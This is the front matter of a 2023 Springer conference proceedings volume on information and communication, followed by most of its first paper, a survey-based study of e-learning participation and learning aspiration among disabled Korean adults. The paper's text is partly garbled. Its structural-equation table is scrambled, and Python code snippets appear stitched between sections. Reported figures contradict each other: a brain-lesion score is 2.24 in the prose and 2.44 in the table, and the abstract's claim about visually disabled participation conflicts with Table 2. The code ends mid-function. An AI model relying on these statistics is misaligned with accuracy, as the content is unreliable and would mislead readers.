English Pages 926 [927] Year 2023
Lecture Notes in Networks and Systems 652
Kohei Arai Editor
Advances in Information and Communication Proceedings of the 2023 Future of Information and Communication Conference (FICC), Volume 2
Series Editor Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland
Advisory Editors Fernando Gomide, Department of Computer Engineering and Automation—DCA, School of Electrical and Computer Engineering—FEEC, University of Campinas—UNICAMP, São Paulo, Brazil Okyay Kaynak, Department of Electrical and Electronic Engineering, Bogazici University, Istanbul, Turkey Derong Liu, Department of Electrical and Computer Engineering, University of Illinois at Chicago, Chicago, USA Institute of Automation, Chinese Academy of Sciences, Beijing, China Witold Pedrycz, Department of Electrical and Computer Engineering, University of Alberta, Alberta, Canada Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland Marios M. Polycarpou, Department of Electrical and Computer Engineering, KIOS Research Center for Intelligent Systems and Networks, University of Cyprus, Nicosia, Cyprus Imre J. Rudas, Óbuda University, Budapest, Hungary Jun Wang, Department of Computer Science, City University of Hong Kong, Kowloon, Hong Kong
The series “Lecture Notes in Networks and Systems” publishes the latest developments in Networks and Systems—quickly, informally and with high quality. Original research reported in proceedings and post-proceedings represents the core of LNNS. Volumes published in LNNS embrace all aspects and subfields of, as well as new challenges in, Networks and Systems. The series contains proceedings and edited volumes in systems and networks, spanning the areas of Cyber-Physical Systems, Autonomous Systems, Sensor Networks, Control Systems, Energy Systems, Automotive Systems, Biological Systems, Vehicular Networking and Connected Vehicles, Aerospace Systems, Automation, Manufacturing, Smart Grids, Nonlinear Systems, Power Systems, Robotics, Social Systems, Economic Systems and other. Of particular value to both the contributors and the readership are the short publication timeframe and the world-wide distribution and exposure which enable both a wide and rapid dissemination of research output. The series covers the theory, applications, and perspectives on the state of the art and future developments relevant to systems and networks, decision making, control, complex processes and related areas, as embedded in the fields of interdisciplinary and applied sciences, engineering, computer science, physics, economics, social, and life sciences, as well as the paradigms and methodologies behind them. Indexed by SCOPUS, INSPEC, WTI Frankfurt eG, zbMATH, SCImago. All books published in the series are submitted for consideration in Web of Science. For proposals from Asia please contact Aninda Bose ([email protected]).
Editor Kohei Arai Faculty of Science and Engineering Saga University Saga, Japan
ISSN 2367-3370 ISSN 2367-3389 (electronic) Lecture Notes in Networks and Systems ISBN 978-3-031-28072-6 ISBN 978-3-031-28073-3 (eBook) https://doi.org/10.1007/978-3-031-28073-3 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland
Preface
We are extremely delighted to bring forth the eighth edition of Future of Information and Computing Conference, 2023 (FICC 2023) held successfully on 2 and 3 March 2023. We successfully leveraged the advantages of technology for seamlessly organizing the conference in a virtual mode which allowed 150+ attendees from 45+ nations across the globe to attend this phenomenal event. The conference allowed learned scholars, researchers and corporate tycoons to share their valuable and out-of-the-box studies related to communication, data science, computing and Internet of things. The thought-provoking keynote addresses, unique and informative paper presentations and useful virtual roundtables were the key attractions of this conference. The astounding success of the conference can be gauged by the overwhelming response in terms of papers received. A total number of 369 papers were received, out of which 143 were handpicked by careful review in terms of originality, applicability and presentation, and 119 are finally published in this edition. The papers not only presented various novel and innovative ways of dealing with mundane, time-consuming and repetitive tasks in a fool-proof manner but also provided a sneak peek into the future where technology would be an inseparable part of each one’s life. The studies also gave an important thread for future research and beckoned all the bright minds to foray in those fields. The conference indeed brought about a scientific awakening amongst all its participants and viewers and is bound to bring about a renaissance in the field of communication and computing. The conference could not have been successful without the hard work of many people on stage and back stage. The keen interest of authors along with the comprehensive evaluation of papers by technical committee members was the main driver of the conference. The session chairs committee’s efforts were noteworthy. 
We would like to express our heartfelt gratitude to all the above stakeholders. A special note of thanks to our wonderful keynote speakers who added sparkle to the entire event. Last but certainly not least, we would extend our gratitude to the organizing committee who toiled hard to make this virtual event a grand success. We sincerely hope to provide an enriching and nourishing food for thought to our readers by means of our well-researched studies published in this edition. The overwhelming response by authors, participants and readers motivates us to better ourselves each time. We hope to receive continued support and enthusiastic participation from our distinguished scientific fraternity. Regards, Kohei Arai
Contents

The Disabled’s Learning Aspiration and E-Learning Participation
  Seonglim Lee, Jaehye Suk, Jinu Jung, Lu Tan, and Xinyu Wang
Are CK Metrics Enough to Detect Design Patterns?
  Gcinizwe Dlamini, Swati Megha, and Sirojiddin Komolov
Detecting Cyberbullying from Tweets Through Machine Learning Techniques with Sentiment Analysis
  Jalal Omer Atoum
DNA Genome Classification with Machine Learning and Image Descriptors
  Daniel Prado Cussi and V. E. Machaca Arceda
A Review of Intrusion Detection Systems Using Machine Learning: Attacks, Algorithms and Challenges
  Jose Luis Gutierrez-Garcia, Eddy Sanchez-DelaCruz, and Maria del Pilar Pozos-Parra
Head Orientation of Public Speakers: Variation with Emotion, Profession and Age
  Yatheendra Pravan Kidambi Murali, Carl Vogel, and Khurshid Ahmad
Using Machine Learning to Identify Top Antecedents Affecting Crime in US Communities
  Kamil Samara
Hybrid Quantum Machine Learning Classifier with Classical Neural Network Transfer Learning
  Avery Leider, Gio Giorgio Abou Jaoude, and Pauline Mosley
Repeated Potentiality Augmentation for Multi-layered Neural Networks
  Ryotaro Kamimura
SGAS-es: Avoiding Performance Collapse by Sequential Greedy Architecture Search with the Early Stopping Indicator
  Shih-Ping Lin and Sheng-De Wang
Artificial Intelligence in Forensic Science
  Nazneen Mansoor and Alexander Iliev
Deep Learning Based Approach for Human Intention Estimation in Lower-Back Exoskeleton
  Valeriya Zanina, Gcinizwe Dlamini, and Vadim Palyonov
TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
  Anh-Duy Pham, Anastassia Kuestenmacher, and Paul G. Ploeger
AI in Cryptocurrency
  Alexander I. Iliev and Malvika Panwar
Short Term Solar Power Forecasting Using Deep Neural Networks
  Sana Mohsin Babbar and Lau Chee Yong
Convolutional Neural Networks for Fault Diagnosis and Condition Monitoring of Induction Motors
  Fatemeh Davoudi Kakhki and Armin Moghadam
Huber Loss and Neural Networks Application in Property Price Prediction
  Alexander I. Iliev and Amruth Anand
Text Regression Analysis for Predictive Intervals Using Gradient Boosting
  Alexander I. Iliev and Ankitha Raksha
Chosen Methods of Improving Small Object Recognition with Weak Recognizable Features
  Magdalena Stachoń and Marcin Pietroń
Factors Affecting the Adoption of Information Technology in the Context of Moroccan SMEs
  Yassine Zouhair, Mustapha Belaissaoui, and Younous El Mrini
Aspects of the Central and Decentral Production Parameter Space, Its Meta-Order and Industrial Application Simulation Example
  Bernhard Heiden, Ronja Krimm, Bianca Tonino-Heiden, and Volodymyr Alieksieiev
Gender Equality in Information Technology Processes: A Systematic Mapping Study
  J. David Patón-Romero, Sunniva Block, Claudia Ayala, and Letizia Jaccheri
The P vs. NP Problem and Attempts to Settle It via Perfect Graphs State-of-the-Art Approach
  Maher Heal, Kia Dashtipour, and Mandar Gogate
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth
  Mohammed Bergui, Nikola S. Nikolov, and Said Najah
Survey of Schema Languages: On a Software Complexity Metric
  Kehinde Sotonwa, Johnson Adeyiga, Michael Adenibuyan, and Moyinoluwa Dosunmu
Bohmian Quantum Field Theory and Quantum Computing
  F. W. Roush
Service-Oriented Multidisciplinary Computing: From Code Providers to Transdisciplines
  Michael Sobolewski
Incompressible Fluid Simulation Parallelization with OpenMP, MPI and CUDA
  Xuan Jiang, Laurence Lu, and Linyue Song
Predictive Analysis of Solar Energy Production Using Neural Networks
  Vinitha Hannah Subburaj, Nickolas Gallegos, Anitha Sarah Subburaj, Alexis Sopha, and Joshua MacFie
Implementation of a Tag Playing Robot for Entertainment
  Mustafa Ayad, Jessica MacKay, and Tyrone Clarke
English-Filipino Speech Topic Tagger Using Automatic Speech Recognition Modeling and Topic Modeling
  John Karl B. Tumpalan and Reginald Neil C. Recario
A Novel Adaptive Fuzzy Logic Controller for DC-DC Buck Converters
  Thuc Kieu-Xuan and Duc-Cuong Quach
Visual Mechanisms Inspired Efficient Transformers for Image and Video Quality Assessment
  Junyong You and Zheng Zhang
A Neural Network Based Approach for Estimation of Real Estate Prices
  Ventsislav Nikolov
Contextualizing Artificially Intelligent Morality: A Meta-ethnography of Theoretical, Political and Applied Ethics
  Jennafer Shae Roberts and Laura N. Montoya
An Analysis of Current Fall Detection Systems and the Role of Smart Devices and Machine Learning in Future Systems
  Edward R. Sykes
Authentication Scheme Using Honey Sentences
  Nuril Kaunaini Rofiatunnajah and Ari Moesriami Barmawi
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol Using Heterogeneous Strong Designated Verifier Signature
  Can Zhao, XiaoXiao Wang, Zhengzhu Lu, Jiahui Wang, Dejun Wang, and Bo Meng
Framework for Multi-factor Authentication with Dynamically Generated Passwords
  Ivaylo Chenchev
Randomness Testing on Strict Key Avalanche Data Category on Confusion Properties of 3D-AES Block Cipher Cryptography Algorithm
  Nor Azeala Mohd Yusof and Suriyani Ariffin
A Proof of P != NP: New Symmetric Encryption Algorithm Against Any Linear Attacks and Differential Attacks
  Gao Ming
Python Cryptographic Secure Scripting Concerns: A Study of Three Vulnerabilities
  Grace LaMalva, Suzanna Schmeelk, and Dristi Dinesh
Developing a GSM-GPS Based Tracking System: Vulnerable Nigerian School Children as a Case Study
  Afolayan Ifeoluwa and Idachaba Francis
Standardization of Cybersecurity Concepts in Automotive Process Models: An Assessment Tool Proposal
  Noha Moselhy and Ahmed Adel Mahmoud
Factors Affecting the Persistence of Deleted Files on Digital Storage Devices
  Tahir M. Khan, James H. Jones Jr., and Alex V. Mbazirra
Taphonomical Security: DNA Information with a Foreseeable Lifespan
  Fatima-Ezzahra El Orche, Marcel Hollenstein, Sarah Houdaigoui, David Naccache, Daria Pchelina, Peter B. Rønne, Peter Y. A. Ryan, Julien Weibel, and Robert Weil
Evaluation and Analysis of Reversible Watermarking Techniques in WSN for Secure, Lightweight Design of IoT Applications: A Survey
  Tanya Koohpayeh Araghi, David Megías, and Andrea Rosales
Securing Personally Identifiable Information (PII) in Personal Financial Statements
  George Hamilton, Medina Williams, and Tahir M. Khan
Conceptual Mapping of the Cybersecurity Culture to Human Factor Domain Framework
  Emilia N. Mwim, Jabu Mtsweni, and Bester Chimbo
Attacking Compressed Vision Transformers
  Swapnil Parekh, Pratyush Shukla, and Devansh Shah
Analysis of SSH Honeypot Effectiveness
  Connor Hetzler, Zachary Chen, and Tahir M. Khan
Human Violence Recognition in Video Surveillance in Real-Time
  Herwin Alayn Huillcen Baca, Flor de Luz Palomino Valdivia, Ivan Soria Solis, Mario Aquino Cruz, and Juan Carlos Gutierrez Caceres
Establishing a Security Champion in Agile Software Teams: A Systematic Literature Review
  Hege Aalvik, Anh Nguyen-Duc, Daniela Soares Cruzes, and Monica Iovan
HTTPA: HTTPS Attestable Protocol
  Gordon King and Hans Wang
HTTPA/2: A Trusted End-to-End Protocol for Web Services
  Gordon King and Hans Wang
Qualitative Analysis of Synthetic Computer Network Data Using UMAP
  Pasquale A. T. Zingo and Andrew P. Novocin
Device for People Detection and Tracking Using Combined Color and Thermal Camera
  Paweł Woronow, Karol Jedrasiak, Krzysztof Daniec, Hubert Podgorski, and Aleksander Nawrat
Robotic Process Automation for Reducing Food Wastage in Swedish Grocery Stores
  Linus Leffler, Niclas Johansson Bräck, and Workneh Yilma Ayele
A Survey Study of Psybersecurity: An Emerging Topic and Research Area
  Ankur Chattopadhyay and Nahom Beyene
Author Index
The Disabled’s Learning Aspiration and E-Learning Participation

Seonglim Lee¹, Jaehye Suk²(✉), Jinu Jung¹, Lu Tan¹, and Xinyu Wang¹

¹ Department of Consumer Science, Convergence Program for Social Innovation, Sungkyunkwan University, Seoul, South Korea
² Convergence Program for Social Innovation, Sungkyunkwan University, Seoul, South Korea
[email protected]
Abstract. This study examined the effects of ICT access/usage and learning aspiration on the disabled's e-learning participation, using data from the 2020 Survey on Digital Divide collected by the National Information Society Agency in Korea, a nationally representative sample of 4,606 individuals, including the disabled and non-disabled. Chi-square tests, analysis of variance, and Structural Equation Modeling (SEM) were conducted. The major findings were as follows. First, the type of disability did not have a significant effect on learning aspiration but significantly affected whether respondents participated in e-learning. The visual and hearing/language disabled were more likely to participate in e-learning than the non-disabled. These findings suggest that the disabled have as much learning aspiration as the non-disabled and, if anything, a greater demand for e-learning. Second, access to a PC/notebook and internet usage were related to higher learning aspiration, and those with stronger learning aspirations were more likely to participate in e-learning activities. Therefore, relative to those who cannot access a PC/notebook or use the Internet, access to a PC/notebook and internet usage affect e-learning participation not only directly but also indirectly through learning aspiration. The findings suggest that ICT access and use are not merely tools necessary for e-learning; they also contribute to e-learning by stimulating learning aspirations.

Keywords: Disabled · E-learning · Learning aspiration · Access to ICT devices · Internet use
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 1–10, 2023. https://doi.org/10.1007/978-3-031-28073-3_1

1 Introduction

With the outbreak of the COVID-19 pandemic, quarantine and lockdown policies worldwide have highlighted the strengths of e-learning, such as being cost-effective, time-efficient, and independent of time and place, leading to rapid growth in e-learning [1]. E-learning helps break isolation and increase social connections by integrating learners into a virtual learning community while they acquire new knowledge [2]. With the rising popularity of e-learning, consumers can now access educational resources more efficiently than before. E-learning can be an effective mode for the disabled to improve their access to education and help them integrate into a knowledge-based economy and society [3]. Socially isolated disabled people have a high demand for e-learning because of their limited educational opportunities.

Accessibility is the most crucial factor affecting e-learning participation [4]. Concerning e-learning for the disabled, the problems of accessibility and the application of assistive technologies have been consistently emphasized. Although the disabled face various difficulties in taking e-learning classes, including the shortage and high cost of usable ICT devices and services, insufficient assistive technology, and a lack of skills to use devices [5–7], scant research has been conducted on their e-learning participation.

This study aims to examine the e-learning participation of the Korean disabled, focusing on adult lifelong education. The specific research questions are as follows:

1) What is the difference in the e-learning participation rate, perceived effectiveness of e-learning, and learning aspiration between the disabled and non-disabled by the types of disabilities?
2) What is the difference in ICT access and use between the disabled and non-disabled by the types of disabilities?
3) How do the types of disability, ICT access and use, and learning aspiration affect e-learning participation?
4) Does learning aspiration mediate the relationship between the types of disability and e-learning participation and between access to and use of ICT and e-learning participation?

This study will reveal the unique challenges for e-learning participation faced by the disabled and provide constructive suggestions to satisfy the disabled's demand for learning.
2 Literature Review

2.1 Lifelong Education for the Disabled

Lifelong education refers to learning and teaching activities conducted throughout life to improve the quality of human life [8]. It is a self-directed learning activity conducted by learners for self-realization and fulfillment throughout their lives [9]. Since lifelong education is learning for everyone, no one can be excluded from it. It satisfies humans' unique learning instincts, guarantees the right to learn, improves the quality of life, and increases national competitiveness. The right to lifelong education for the disabled is not an optional requirement to compensate for the deficiency caused by the disability. Regardless of the presence or absence of disabilities, opportunities should be provided to guarantee everyone's right to lifelong learning and lifelong education, and equity should be secured. Lifelong education for the disabled is not only a means of satisfying their right to lifelong learning but also fosters the ability to cope with the many hardships, difficulties, and unexpected situations that the disabled can experience in their lives [9, 10]. Ultimately, it is instrumental in realizing the self-reliance of the disabled pursued by welfare for the disabled [9].

However, most educational activities for the disabled so far have been aimed mainly at school-age disabled people. To guarantee the disabled's right to lifelong learning, lifelong education for the disabled must grow not only quantitatively but also qualitatively. Therefore, it is necessary to investigate the disabled's demand for participation in lifelong education and to develop programs based on it. In particular, e-learning provides effective educational opportunities as a tool that can offer teaching-learning opportunities that meet the individualized educational needs of the disabled.

2.2 E-Learning and the Disabled

E-learning is the use of online resources in both distance and conventional learning contexts, and it can be described as “learning environments created using digital technologies which are networked and collaborative via internet technologies” [11]. E-learning includes computer-based training, online learning, virtual learning, web-based learning, and so on [12]. E-learning is considered an educational outgrowth of information and communication technologies (ICTs) and can involve any electronic device, from PCs to cell phones [13]. The technology behind e-learning brings many benefits. For educational institutions, the major benefits of e-learning are that it compensates for the scarcity of academic personnel and enhances knowledge efficiency and competency through easy access to a vast body of information [14]. For individual learners, e-learning can remove the barriers associated with transportation, discrimination, and racism and enable learners to pursue a self-paced learning process through flexibility, accessibility, and convenience [15, 16]. All humans desire to learn, and the socially isolated disabled in particular have a strong desire for learning [17].
However, because of their relatively low access to new technologies, disabled people may face alienation in education or learning. In this respect, the participation of the disabled in e-learning is essential. The use of e-learning by learners with disabilities can enhance independence, facilitate their learning needs, and enable them to use their additional specialist technology [18]. However, disabled individuals experience some difficulties in the process of using e-learning. For example, learners with mental disabilities face problems with a professor's insufficient use of e-learning, learners with hearing disabilities experience issues with the accessibility of audio and video materials, and learners with visual disabilities have difficulty accessing lecture notes and materials. For learners with disabilities, limited accessibility negatively affects learning and the acquisition of new skills [3, 19, 20]. E-learning offers a number of opportunities for persons with disabilities by facilitating access to new services, knowledge, and work from any place and by breaking the isolation that disabled people feel in life [2].

Recent research on e-learning for learners with disabilities has focused mainly on examining e-learning usage and issues in specific countries. The main reasons consumers do not participate in e-learning activities are accessibility [4] and a severe lack of assistive technology in computer labs and libraries [7]. Specifically, non-disabled people have a better ability to use e-learning tools than disabled people because disabled people are more mentally and physically stressed in social pressure tasks than non-disabled people [21].
3 Method

3.1 Sample

This study used data from the 2020 Survey on Digital Divide collected by the National Information Society Agency in Korea. This nationwide survey provided information on the e-learning experience and ICT use of disabled and non-disabled people. From the 9,200 nationally representative survey participants, a sample of 4,606 individuals in their 30s to 50s, consisting of 1,164 disabled and 3,442 non-disabled people, was selected for the analysis. The descriptive characteristics of the sample are shown in Table 1.

Table 1. Descriptive statistics of the sample (N = 4,606, weighted)

Variables                       Disabled (N = 1,164)     Non-disabled (N = 3,442)
                                Freq.      (%)           Freq.      (%)
Gender       Male               846        72.68         1763       51.22
             Female             318        27.32         1679       48.78
Age          30s                130        11.17         1030       29.92
             40s                338        29.04         1183       34.37
             50s                696        59.79         1229       35.71
Education    ≤Middle school     313        26.89         41         1.19
             High school        695        59.71         1562       45.38
             ≥College           156        13.4          1839       53.43
Occupation   White collar       115        9.88          1222       35.5
             Service            84         7.22          472        13.71
             Sales              95         8.16          690        20.05
             Blue collar        272        23.37         511        14.85
             House-keeping      177        15.21         538        15.63
             Not-working        421        36.17         9          0.26
Income       Mean (SD)          270.30     (140.87)      442.84     (119.42)
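The chi-square test of independence, one of the tests applied in this study, can be illustrated with the gender counts reported in Table 1. The following is a minimal sketch rather than the authors' procedure: it treats the weighted frequencies as plain counts, which is an assumption, and the function names are hypothetical. It uses only the Python standard library.

```python
import math

# Observed counts from Table 1.
# Rows: male, female. Columns: disabled, non-disabled.
# Assumption: the weighted frequencies are treated as ordinary counts.
observed = [
    [846, 1763],
    [318, 1679],
]


def chi_square_independence(table):
    """Return (chi2, dof) for a contingency table given as a list of rows."""
    row_totals = [sum(row) for row in table]
    col_totals = [sum(col) for col in zip(*table)]
    grand_total = sum(row_totals)
    chi2 = 0.0
    for i, row in enumerate(table):
        for j, obs in enumerate(row):
            # Expected count under independence of rows and columns.
            expected = row_totals[i] * col_totals[j] / grand_total
            chi2 += (obs - expected) ** 2 / expected
    dof = (len(table) - 1) * (len(table[0]) - 1)
    return chi2, dof


def p_value_one_dof(chi2):
    """Upper-tail p-value of a chi-square statistic with 1 degree of freedom."""
    return math.erfc(math.sqrt(chi2 / 2))


chi2, dof = chi_square_independence(observed)
p_value = p_value_one_dof(chi2)  # valid here because the table is 2 x 2
print(f"chi2 = {chi2:.2f}, dof = {dof}, p = {p_value:.3g}")
```

The closed-form p-value holds only for one degree of freedom; larger tables would need a general chi-square distribution function from a statistics library.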
3.2 Measurement

The dependent variable was e-learning participation: e-learning participants were coded as one, and non-participants as zero. The independent variables included the types of disability and ICT use. Disability consisted of four dummy variables identifying physical, brain lesion, visual, and hearing/language disabilities. The ICT use variables consisted of access to ICT devices and internet use. They were measured with three dummy variables indicating whether one could access a desktop/notebook, whether one could access mobile devices, and whether one had used the Internet during the last month. The mediating variable was learning aspiration, which was measured with three items on a four-point Likert scale ranging from one (“not at all”) to four (“very much”). Socio-demographic variables such as gender, education, age group, occupation, and the logarithm of family income were included as control variables.

3.3 Analysis

Chi-square tests, analysis of variance using the Generalized Linear Model (GLM), and Structural Equation Modeling (SEM) were conducted using STATA (version 17).
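The variable coding described under Measurement can be sketched as follows. This is an illustration under stated assumptions, not the survey's actual codebook: the category labels, the field names, and the use of a simple mean of the three Likert items as the learning aspiration score are all hypothetical choices made for the example.

```python
# Hypothetical labels for the four disability dummies; non-disabled
# respondents (disability=None) form the reference group.
DISABILITY_TYPES = ("physical", "brain_lesion", "visual", "hearing_language")


def code_respondent(disability, pc_access, mobile_access, internet_use,
                    aspiration_items, participated):
    """Turn one respondent's raw answers into model-ready variables."""
    if disability is not None and disability not in DISABILITY_TYPES:
        raise ValueError(f"unknown disability type: {disability!r}")
    if len(aspiration_items) != 3 or any(not 1 <= x <= 4 for x in aspiration_items):
        raise ValueError("expected three items on a 1-4 Likert scale")

    # Four dummies: exactly one is 1 for a disabled respondent, all are 0 otherwise.
    row = {f"dis_{name}": int(disability == name) for name in DISABILITY_TYPES}
    # Three ICT dummies: device access and internet use during the last month.
    row["pc_access"] = int(pc_access)
    row["mobile_access"] = int(mobile_access)
    row["internet_use"] = int(internet_use)
    # Assumption: the aspiration score is the mean of the three items.
    row["learning_aspiration"] = sum(aspiration_items) / 3
    # Dependent variable: 1 for e-learning participants, 0 otherwise.
    row["elearning"] = int(participated)
    return row


example = code_respondent("visual", True, True, False, [3, 2, 4], True)
print(example)
```

Keeping the non-disabled as the all-zero reference group means each disability coefficient in a later model reads as a contrast with non-disabled respondents.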
4 Results
4.1 E-Learning Participation Rate and Perceived Effectiveness of E-Learning
Table 2 shows the distribution of e-learning participation rates and the perceived effectiveness of e-learning by type of disability and for the non-disabled. Compared with the non-disabled, the e-learning participation rates were higher for the physical and hearing/language disabled but lower for the brain lesion and visual disabled. Perceived effectiveness of e-learning differed significantly among the types of disability. In the analysis using the whole sample, including non-participants in e-learning, the hearing/language disabled perceived e-learning to be as effective as the non-disabled did. In the analysis using participants only, the perceived effectiveness of e-learning did not differ significantly among the physical, visual, and hearing/language disabled and the non-disabled. Overall, the e-learning participant sample perceived e-learning as more effective than the whole sample, including non-participants. The results suggested that some non-participants expected e-learning to be less effective than those who had experienced it found it to be. The learning aspiration score was the highest for the non-disabled (2.82), followed by the hearing/language disabled (2.55), physical disabled (2.52), visual disabled (2.28), and brain lesion (2.24). Overall, the disabled had lower learning aspirations than the non-disabled. Specifically, the brain lesion and visual disabled showed the two lowest learning aspiration scores.

Table 2. E-learning participants and perceived effectiveness of e-learning

| | Disabled: Physical | Disabled: Brain lesion | Disabled: Visual | Disabled: Hearing/Language | Non-disabled | Chi sq/F value |
|---|---|---|---|---|---|---|
| Participation rate (%) | 37.70 | 15.93 | 15.82 | 35.71 | 28.73 | 37.42*** |
| Perceived effectiveness (total sample) | 2.62 (0.87) b | 2.4 (0.81) c | 2.65 (0.92) b | 2.82 (0.81) a | 2.82 (0.50) a | 16.08*** |
| Perceived effectiveness (participants) | 2.83 (0.78) ab | 2.72 (0.67) b | 2.84 (0.8) ab | 2.88 (0.72) ab | 3.07 (0.68) a | 7.55*** |
| Learning aspiration | 2.52 (0.65) b | 2.44 (0.71) c | 2.28 (0.69) c | 2.55 (0.64) b | 2.82 (0.57) a | 87.92*** |

* p < .05, ** p < .01, *** p < .001

4.2 ICT Access and Use
Table 3 shows the percent distribution of access to ICT devices and internet use rates. Overall, the non-disabled showed higher access and usage rates than the disabled. Almost all of the non-disabled accessed mobile devices and used the Internet. The rates of ICT access and Internet use differed among the types of disability. Overall, the physical and hearing/language disabled were more likely to access and use ICT than the other disabled groups. Among the disabled, the rate of access to mobile devices was higher than that of access to desktops/notebooks. The visual disabled showed the lowest rates of internet use and of access to mobile devices. These findings suggested that the visual disabled may be the most disadvantaged in ICT access and use.

Table 3. ICT access and use (%)

| | Disabled: Physical | Disabled: Brain lesion | Disabled: Visual | Disabled: Hearing/Language | Non-disabled |
|---|---|---|---|---|---|
| Desktop/Notebook | 81.43 | 60.18 | 71.52 | 75.00 | 90.62 |
| Mobile | 94.37 | 84.96 | 82.28 | 96.43 | 99.74 |
| Internet use | 91.42 | 77.88 | 72.28 | 97.32 | 99.45 |
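The comparisons drawn from Table 3 are simple arithmetic and can be checked directly. The following is a minimal sketch, not part of the original analysis: the rates are copied from Table 3, while the names `RATES`, `gaps_to_reference`, and `lowest_group` are hypothetical and introduced only for illustration.

```python
# ICT access and use rates (%) copied from Table 3.
RATES = {
    "Desktop/Notebook": {"Physical": 81.43, "Brain lesion": 60.18, "Visual": 71.52,
                         "Hearing/Language": 75.00, "Non-disabled": 90.62},
    "Mobile": {"Physical": 94.37, "Brain lesion": 84.96, "Visual": 82.28,
               "Hearing/Language": 96.43, "Non-disabled": 99.74},
    "Internet use": {"Physical": 91.42, "Brain lesion": 77.88, "Visual": 72.28,
                     "Hearing/Language": 97.32, "Non-disabled": 99.45},
}
REFERENCE = "Non-disabled"


def gaps_to_reference(rates, reference=REFERENCE):
    """Percentage-point gap between the reference group and each other group."""
    return {
        indicator: {
            group: round(by_group[reference] - value, 2)
            for group, value in by_group.items()
            if group != reference
        }
        for indicator, by_group in rates.items()
    }


def lowest_group(rates, reference=REFERENCE):
    """Disability group with the lowest rate for each indicator."""
    return {
        indicator: min((g for g in by_group if g != reference), key=by_group.get)
        for indicator, by_group in rates.items()
    }


gaps = gaps_to_reference(RATES)
lowest = lowest_group(RATES)
for indicator in RATES:
    group = lowest[indicator]
    print(f"{indicator}: lowest for {group}, gap {gaps[indicator][group]} points")
```

Under these figures the visual disabled have the lowest mobile access and internet use rates, and the brain lesion group has the lowest desktop/notebook access rate.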
4.3 The Results of Structural Equation Model for E-Learning Participation
The results of the SEM analysis are presented in Table 4. The fit indices of the structural model were χ2 = 1114.282 (P = 0.000), CFI = 0.975, TLI = 0.852, RMSEA = .044, and SRMR = 0.007, indicating that the model was acceptable.
As shown in Table 4, access to a PC/notebook and internet use were significantly associated with learning aspiration. Those who had access to a PC/notebook and used the Internet were more likely to participate in e-learning. The types of disability were not significantly related to learning aspiration when ICT access and usage variables and socio-demographic variables were controlled for. The results suggested that the disability itself did not affect learning aspiration, whereas the ICT environment and socio-economic conditions were influential in having learning aspirations. Those in their 30s and 40s had significantly higher learning aspirations than those in their 50s. Higher family income and having a white-collar, service, or sales job, as opposed to not working, were significantly associated with higher learning aspirations. The variables which significantly affected e-learning participation were learning aspiration, the types of disability, ICT access and use, gender, and age groups. The physical and hearing/language disabled were more likely to participate in e-learning than
Table 4. Result of structural equation model analysis for e-learning participation
Learning aspiration B 0.072
(0.062)
0.159 (0.047)***
Brain
–0.047
(0.085)
0.032 (0.055)
Visual
–0.041
(0.076)
0.035 (0.051)
0.079
(0.080)
0.147 (0.058)**
P.C./notebook
0.104
(0.108)***
0.050 (0.025)*
Mobile
Physical
Hearing/Language Access to devices
Bootstrap (S.E) 0.199 (0.014)***
Learning aspiration Disable (Non-disabled)1 )
E-learning participation
Bootstrap (S.E) B
0.491
(0.091
Internet use
1.426
(0.124)***
Male (Female)1 )
0.040
(0.027)
−0.024 (0.036) 0.129 (0.033)*** −0.044 (0.019)**
Education (Middle school)1 )
High school
Age group (the 50s)1 )
The 30s
0.2237 (0.031)***
0.178 (0.027)***
The 40s
0.072 (0.020)***
Log(income)
0.0964 (0.028)*** 0.123 (0.039)**
Occupation(Non)1) White
0.298
(0.040)***
Service
0.132
(0.046)***
Sales
0.218
(0.041)***
Blue
0.072
(0.039)
1.429
(0.121)***
Constant
College
−0.016 (0.026)
–0.356 (0.079)***
Notes: 1) The reference point for the dummy variable. Based on 3,000 bootstrap samples (n = 2,351). * p < .05, ** p < .01, *** p < .001
the non-disabled. Those who had higher learning aspirations, had access to a PC/notebook, and used the Internet were more likely to participate in e-learning. As shown in Table 5, we found a positive mediation effect of learning aspiration in the relationship between ICT access/usage and e-learning participation. The results indicated that ICT access and usage not only directly affected e-learning participation but also had an indirect influence by enhancing learning aspiration.

Table 5. Mediation effect of learning aspiration on e-learning participation

| Path | Effect | Bootstrap S.E | 95% CI Lower | 95% CI Upper |
|---|---|---|---|---|
| Access to PC/notebook → Learning aspiration → E-learning participation | .029*** | .008 | .013 | .045 |
| Internet use → Learning aspiration → E-learning participation | .098*** | .020 | .059 | .136 |

Notes: Based on 3,000 bootstrap samples. CI = confidence interval. * p < .05, ** p < .01, *** p < .001
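A bootstrapped mediation (indirect) effect of the kind reported in Table 5 can be illustrated with a product-of-coefficients estimate and a percentile confidence interval. The sketch below is an assumption-laden illustration, not the authors' STATA SEM: it uses plain least squares on synthetic data, treats the outcome as continuous, and all names (`path_coefficients`, `indirect_effect`, `bootstrap_ci`) and data-generating values are hypothetical.

```python
import random


def path_coefficients(x, m, y):
    """Return (a, b): a is the slope of m on x; b is the slope of y on m
    with x held fixed (two-predictor least squares)."""
    n = len(x)
    mean_x, mean_m, mean_y = sum(x) / n, sum(m) / n, sum(y) / n
    sxx = sum((xi - mean_x) ** 2 for xi in x)
    smm = sum((mi - mean_m) ** 2 for mi in m)
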